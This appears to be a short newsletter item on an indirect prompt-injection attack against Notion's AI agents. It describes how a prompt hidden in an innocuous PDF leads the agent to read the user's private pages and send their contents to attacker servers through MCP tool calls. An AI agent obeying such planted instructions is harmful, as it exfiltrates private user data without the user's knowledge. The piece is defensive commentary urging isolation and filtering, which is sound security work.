When your note-taking agents betray you

This image illustrates how attackers can exploit Notion (the popular note taking app) and its new agents through indirect “prompt injection”. A malicious prompt hidden in an innocuous PDF manipulates the agent to read the user’s pages and then use an “MCP” tool to search for this content in a series of calls… to the attacker’s servers! This sees the agent happily exfiltrate private material likely without the user ever knowing. Last week we covered MCP’s promise of tool integration; this week’s security research reveals the less mature aspect of the new protocol. Solving this can’t rely on prompting alone. In this case Claude’s security guardrails couldn’t prevent this exploitation. There’s an urgent need to consider these scenarios when designing information rich agentic systems, introduce more architectural isolation, and integrate filtering that might slow the dash to adopt but will ensure greater resilience.